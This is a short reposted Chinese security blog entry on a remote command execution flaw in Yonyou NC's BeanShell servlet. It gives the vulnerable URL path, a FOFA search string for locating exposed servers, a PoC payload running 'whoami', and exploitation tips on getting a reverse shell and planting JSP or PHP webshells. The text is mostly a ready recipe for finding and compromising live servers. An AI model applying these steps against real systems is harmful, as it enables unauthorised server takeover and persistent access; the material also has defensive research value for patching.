用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞


0x00 漏洞描述

用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,通過BeanShell 執行遠程命令獲取服務器權限

看到這個beanshell,就會想起來一個洞,是泛微OA的beanshell

0x01 漏洞影響

用友 NC

0x02 FOFA

“用友網絡”

0x03 漏洞復現

漏洞位置

/servlet/~ic/bsh.servlet.BshServlet

將POC修改為:

exec(“whoami”)

0x04 利用總結

1、使用反彈方式進行獲取權限

2、關於webshell:NC讓我回想起實戰時的泛微OA,如果jsp文件寫shell不成功的時候,可以嘗試下寫入php,會有意想不到的收獲。

轉載請注明:Adminxe's Blog » 用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM